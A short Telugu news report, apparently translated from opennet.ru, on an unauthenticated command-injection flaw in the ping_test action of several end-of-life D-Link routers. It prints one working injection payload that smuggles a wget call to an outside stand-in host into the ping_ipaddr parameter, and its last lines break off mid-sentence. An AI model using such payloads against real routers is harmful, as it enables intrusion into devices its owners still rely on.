డి-లింక్ వైర్లెస్ రౌటర్లలో
ఆసక్తికరంగా, ఫర్మ్వేర్ డెవలపర్ల ప్రకారం, "ping_test" కాల్ ప్రామాణీకరణ తర్వాత మాత్రమే అమలు చేయబడాలి, అయితే వాస్తవానికి ఇది వెబ్ ఇంటర్ఫేస్లోకి లాగిన్ అయినప్పటికీ, ఏ సందర్భంలోనైనా పిలువబడుతుంది. ప్రత్యేకించి, apply_sec.cgi స్క్రిప్ట్ని యాక్సెస్ చేస్తున్నప్పుడు మరియు “action=ping_test” పరామితిని పాస్ చేస్తున్నప్పుడు, స్క్రిప్ట్ ప్రమాణీకరణ పేజీకి దారి మళ్లిస్తుంది, కానీ అదే సమయంలో ping_testతో అనుబంధించబడిన చర్యను నిర్వహిస్తుంది. కోడ్ని అమలు చేయడానికి, ping_test లోనే మరొక దుర్బలత్వం ఉపయోగించబడింది, ఇది పరీక్ష కోసం పంపబడిన IP చిరునామా యొక్క ఖచ్చితత్వాన్ని సరిగ్గా తనిఖీ చేయకుండా పింగ్ యుటిలిటీని పిలుస్తుంది. ఉదాహరణకు, wget యుటిలిటీకి కాల్ చేయడానికి మరియు “echo 1234” కమాండ్ ఫలితాలను బాహ్య హోస్ట్కు బదిలీ చేయడానికి, “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// అనే పరామితిని పేర్కొనండి. test.test/?$( echo 1234)".
దుర్బలత్వం యొక్క ఉనికి క్రింది నమూనాలలో అధికారికంగా నిర్ధారించబడింది:
- DIR-655 ఫర్మ్వేర్ 3.02b05 లేదా అంతకంటే పాతది;
- DIR-866L ఫర్మ్వేర్ 1.03b04 లేదా అంతకంటే పాతది;
- DIR-1565 ఫర్మ్వేర్ 1.01 లేదా అంతకంటే పాతది;
- DIR-652 (సమస్యాత్మక ఫర్మ్వేర్ సంస్కరణల గురించి సమాచారం అందించబడలేదు)
ఈ మోడల్లకు మద్దతు వ్యవధి ఇప్పటికే గడువు ముగిసింది, కాబట్టి D-Link
ఆ దుర్బలత్వం కూడా ఉందని తర్వాత తెలిసింది
మూలం: opennet.ru